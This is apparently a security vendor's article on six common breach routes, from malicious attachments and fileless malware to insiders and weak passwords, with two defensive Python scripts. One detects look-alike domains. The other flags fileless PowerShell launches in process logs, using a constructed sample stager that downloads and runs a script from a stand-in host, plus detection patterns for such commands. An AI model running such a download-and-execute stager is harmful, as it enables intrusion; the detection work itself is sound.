The Most Common Security Breaches
Malware attacks on business systems keep increasing, and solid cybersecurity has never been more challenging. One of the best ways to stay protected is to know how attacks actually happen. With that in mind, here are six common ways your IT systems can be broken into.
You are tricked into installing malicious software
There are many ways you can be tricked into downloading and installing malware. One of the most common is opening a malicious email attachment.
For example, a firm with an open job posting will readily open a résumé that arrives as a Word document or PDF, and an attacker knows it: a document carrying a malicious macro or an embedded exploit is a natural fit for that inbox.
Here are some steps you can take to avoid accidentally installing malware:
- Never download files from an untrusted source. If a website asks you to download something, make sure the site is reputable. Double-check the URL to verify it is the site you think it is and not a look-alike.
- Always look at the name of the file before downloading. Malware is often deliberately given a name similar to a legitimate file, with a slight spelling change, a double extension such as invoice.pdf.exe, or unusual wording. If you are unsure about the file, don't download it or click on it.
- Always scan a file before opening or installing it, and use email threat detection software to screen out malicious attachments before they reach the user.
Visiting legitimate-looking websites that actually are malicious
Fileless malware differs from most other malware in how it gets onto the machine and where it lives once it is there.
Cybercriminals often seek ways to install malicious files on your computer. A fileless attack doesn't require that. Instead, it abuses tools and interpreters that are already built into your operating system (PowerShell, the Windows Script Host and WMI are the usual examples) and runs its payload inside those legitimate processes.
That malware then hides in memory rather than on disk.
Fileless malware piggybacks on legitimate scripts and processes, executing malicious activity while the legitimate programs continue to run.
Fileless malware can evade traditional antivirus because it is memory-based, not file-based. Signature-based antivirus works against other malware because it detects the "footprints" of a known file on disk.
Fileless malware leaves few such footprints on disk, so a file-scanning antivirus has little to match against. It does leave other traces: the command line that launched it, script-block and PowerShell logs, and the contents of memory, which is what behaviour-based detection looks at.
Cybercriminals also create fraudulent websites designed to appear legitimate. When users visit these pages, the site probes for vulnerabilities in the browser and its plugins (Flash was the classic target before it reached end of life) that allow malicious code to run in browser memory. These sites typically impersonate legitimate sites with look-alike URLs: "rn" in place of "m", a capital "I" in place of a lowercase "l", "00" in place of "oo", and so on.
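The look-alike substitutions above can be checked mechanically. The following is an added example in Python, not code from the original article or from any product it describes; the trusted-domain list and the confusable tables are constructed for illustration. It reduces a host name to the shape a human sees (punycode decoded, accents stripped, "rn" folded to "m", "0" to "o", capital "I" to "l", Cyrillic homoglyphs to their Latin twins) and compares that skeleton, plus a one-character edit distance for plain typos, against the domains the organisation actually uses.

```python
import unicodedata

# Constructed allow-list of domains the organisation actually uses (an assumption for this example).
TRUSTED_DOMAINS = ["microsoft.com", "google.com", "paypal.com", "example-bank.com"]

# Multi-character sequences that read as a single letter at a glance.
CONFUSABLE_SEQUENCES = [("rn", "m"), ("vv", "w"), ("cl", "d")]
# Single characters that look like a Latin letter: digits, punctuation and a few
# Cyrillic letters (the Cyrillic entries are the attacker's IDN homoglyphs).
CONFUSABLE_CHARS = {
    "0": "o", "1": "l", "|": "l", "!": "i", "3": "e", "5": "s", "8": "b",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0445": "x", "\u0443": "y",
}


def skeleton(domain: str) -> str:
    """Reduce a host name to what a human *sees*: decode punycode, drop accents,
    then fold every confusable onto the Latin letter it imitates."""
    host = domain.strip().rstrip(".")
    try:
        # "xn--" labels become their Unicode form; plain ASCII passes through unchanged
        host = host.encode("ascii").decode("idna")
    except UnicodeError:
        pass  # already Unicode, nothing to decode
    host = unicodedata.normalize("NFKD", host)
    host = "".join(c for c in host if not unicodedata.combining(c))
    # Capital I is indistinguishable from lowercase l in many fonts, so fold it before lower-casing.
    host = host.replace("I", "l").lower()
    for seq, rep in CONFUSABLE_SEQUENCES:
        host = host.replace(seq, rep)
    return "".join(CONFUSABLE_CHARS.get(c, c) for c in host)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch plain typosquats such as a dropped letter."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(domain: str, trusted=TRUSTED_DOMAINS):
    """Return the trusted domain that `domain` impersonates, or None when it is
    either exactly a trusted domain or not visually close to any of them."""
    plain = domain.strip().rstrip(".").lower()
    if plain in trusted:
        return None  # the genuine site
    sk = skeleton(domain)
    for t in trusted:
        if sk == skeleton(t) or edit_distance(plain, t) == 1:
            return t
    return None


if __name__ == "__main__":
    for candidate in ["rnicrosoft.com", "paypaI.com", "g00gle.com",
                      "p\u0430ypal.com", "micosoft.com", "microsoft.com", "example.org"]:
        print(f"{candidate:20} -> {lookalike_of(candidate)}")
```

Run this over the sender domains of inbound mail or the link targets in a message before a user sees them; a non-None result means the link is pretending to be a site you trust, and the genuine site always comes back None, so the check never blocks legitimate traffic.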
The key is that fileless malware isn't written to disk like traditional malware. Rather, it lives in RAM (random access memory), which doesn't leave behind the traditional traces of its existence.
Because it works in memory, the running payload is gone when the system reboots. Attackers know this, so they usually add a small persistence hook (a registry run key, a scheduled task or a WMI event subscription) that re-launches the in-memory payload at the next boot. The lack of a file on disk still makes forensics harder: there is less to recover after the fact, and less to build indicators from to prevent future attacks.
There isn’t a simple, updated virus definition file or all-encompassing antivirus tool to guard against fileless malware attacks.
Legacy antivirus solutions, once relied upon, no longer get the job done.
We offer protection from this type of attack by restricting what your legitimate programs are allowed to launch and what they can interact with (application control). This is part of what we call Zero Trust security.
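The "no footprints" point deserves one caveat: a fileless payload still has to be launched by something, and that launch is visible in process-creation logging (Windows event 4688 with command-line auditing, or Sysmon event 1). The following is an added example in Python, not the article's own or any vendor's code; the log format is a constructed time|parent|image|cmdline layout and the sample records are made up for illustration. It decodes PowerShell's -EncodedCommand argument (base64 over UTF-16LE, which is what PowerShell expects) and flags the combination that fileless stagers typically use: a document spawning a script host, a hidden window, and a decoded script that downloads and executes code in memory.

```python
import base64
import re

# Interpreters that fileless payloads run inside (assumed list for this example).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Parents that have no business launching a script host: a document spawning a shell is a macro.
DOCUMENT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
# What a script does when it stages a second payload straight into memory.
DOWNLOAD_EXEC = re.compile(
    r"(?i)\biex\b|invoke-expression|downloadstring|downloadfile|net\.webclient"
    r"|invoke-webrequest|frombase64string|start-bitstransfer")

# Constructed sample: one malicious launch, one legitimate admin script, one ordinary process.
# The encoded command is built here so the sample is valid -EncodedCommand input (base64 of UTF-16LE).
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
_ENC = base64.b64encode(_STAGER.encode("utf-16le")).decode("ascii")
SAMPLE_LOG = [
    f"2024-05-01T09:12:03|WINWORD.EXE|powershell.exe|powershell.exe -nop -w hidden -enc {_ENC}",
    "2024-05-01T09:15:44|explorer.exe|powershell.exe|powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1",
    "2024-05-01T09:20:10|services.exe|svchost.exe|svchost.exe -k netsvcs",
]


def decode_encoded_command(cmdline: str):
    """Return the script hidden behind -e/-ec/-enc/-EncodedCommand, or None if there is none."""
    m = re.search(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # not really base64/UTF-16LE, so not an encoded command


def analyze_record(line: str, threshold: int = 2) -> dict:
    """Score one process-creation record (time|parent|image|cmdline) and list why it looks fileless.
    A record is marked suspicious once `threshold` independent signals agree (tunable assumption)."""
    ts, parent, image, cmdline = (f.strip() for f in line.split("|", 3))
    reasons = []
    if image.lower() in SCRIPT_HOSTS and parent.lower() in DOCUMENT_PARENTS:
        reasons.append(f"{parent} spawned {image}")
    if re.search(r"(?i)-w(?:indowstyle)?\s+hidden", cmdline):
        reasons.append("hidden window")
    if re.search(r"(?i)-nop(?:rofile)?\b", cmdline):
        reasons.append("profile suppressed")
    if re.search(r"(?i)-e(?:xecutionpolicy|p)\s+bypass", cmdline):
        reasons.append("execution policy bypass")
    script = decode_encoded_command(cmdline)
    if script is not None:
        reasons.append("base64-encoded command")
        hit = DOWNLOAD_EXEC.search(script)
        if hit:
            reasons.append(f"decoded script stages code in memory ({hit.group(0)})")
    elif DOWNLOAD_EXEC.search(cmdline):
        reasons.append("command line stages code in memory")
    return {"time": ts, "image": image, "decoded": script,
            "reasons": reasons, "suspicious": len(reasons) >= threshold}


def suspicious_records(lines):
    """Filter a batch of records down to the ones worth an analyst's time."""
    return [r for r in (analyze_record(l) for l in lines) if r["suspicious"]]


if __name__ == "__main__":
    for rec in (analyze_record(l) for l in SAMPLE_LOG):
        flag = "ALERT" if rec["suspicious"] else "ok   "
        print(f"{flag} {rec['time']} {rec['image']}: {'; '.join(rec['reasons']) or 'nothing unusual'}")
        if rec["decoded"]:
            print(f"      decoded: {rec['decoded']}")
```

The legitimate backup script trips one signal (suppressed profile) and stays below the threshold, while the Word-spawned, hidden, encoded download trips five. Decoding the encoded command matters: without it the most telling evidence, the DownloadString call, never appears in the log as plain text.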
Hackers obtain admin privileges
Many users are logged into their computers as administrators. Being an administrator allows you to change settings, install programs, and manage other accounts. This is a major problem: if that account is compromised, the attacker inherits full access to install other malicious software, change settings, or completely take over the machine.
Hackers will then attempt to move laterally through your network to reach your servers and firewall, and begin planning how to extort you.
To avoid this, limit the administrator role to the people who genuinely need it, and even they should do everyday work from a standard user account and elevate only for the task that requires it.
The role of our Zero Trust approach here is to ensure that even if a hacker gets into your network, they will not be able to download files, run unapproved executables or move laterally, because their access is restricted to what the job requires.
Someone physically accesses your computer
Your system can also get infected with malware or your data can get stolen because someone physically accessed your systems.
If you leave your computer unlocked when you go out for lunch, someone can just walk up to it, plug in a malware-infected USB drive, and you are compromised.
An easy way to defend against this is an automatic screen-lock timeout combined with 2-factor authentication at login. You should also lock or log off from your computer whenever you step away from it.
With our Zero trust approach, we disable drives like CD/DVD and USB storage devices. Doing so will limit the chances of anyone using any removable media to infect your computer or steal data from it.
Restricting what users or computers can do, and only allowing what is required to perform their duties is part of the Zero Trust architecture we implement to protect against an attack from inside.
Someone from within the company infects the system
A disgruntled employee can compromise your IT systems. They can do a tremendous amount of damage such as deleting essential data or introducing highly destructive malware.
For most organizations it is not an employee with malicious intent; more often it is someone who has no idea they are infecting the company's systems, because there are so many ways a compromise can happen.
The most effective way to prevent this is to limit what users can access, change, and view. This means designing your network and user access so that people can reach only what they are allowed to, and the systems themselves are restricted from accessing unauthorized resources.
For example, there is no need for users, or their computers, to access your data backups. With our Zero Trust approach we provide these restrictions so that you are protected against insider attacks. We block unauthorized USB drives from even connecting to your systems; we can authorize a specific USB drive, or allow USB drives to carry only specific file types such as pictures (.jpeg or .png).
By using our Zero Trust approach, both malicious and non-malicious users are treated the same and are restricted from accidentally or intentionally compromising your systems.
Your password is compromised
Passwords are typically the main verification method businesses use to access their accounts and systems. The issue with this is that many people have weak passwords that are easy to crack. To make matters worse, many people even use the same password for multiple accounts, which could lead to a massive breach.
Password cracking is fast. A password made of 8 digits has only 10^8 possibilities and falls to an offline attack in well under a second; even 8 mixed-case letters and digits (about 2×10^14 combinations) can be exhausted in hours by a GPU against a fast, unsalted hash. Online guessing is slower because the service can rate-limit it, but a leaked password hash is cracked offline at full speed.
It is therefore important to use 2 factor authentication for access to your systems.
2-factor authentication combines two of the following three categories, so that a stolen password alone is not enough:
Something you know: This could be a personal identification number (PIN), a password, answers to “secret questions” or a specific keystroke pattern
Something you have: Typically, a user would have something in their possession, like a credit card, a smartphone, or a small hardware token
Something you are: This category is more advanced, and might include biometric data like a fingerprint, an iris scan, or a voice print.
This may seem like an inconvenience, but we have found that users quickly get accustomed to 2FA and embrace it once they realize how easy simple passwords are to crack. Many users already use 2FA for their banking and other mobile apps.
The goal of our Zero Trust Managed Security offering is to use a suite of threat hunting tools, combined with user training and granular controls, to build a functional ecosystem that removes as much of the risk from users and their devices as possible.
By accident or not, we work to ensure that unwitting errors do not turn into a compromise.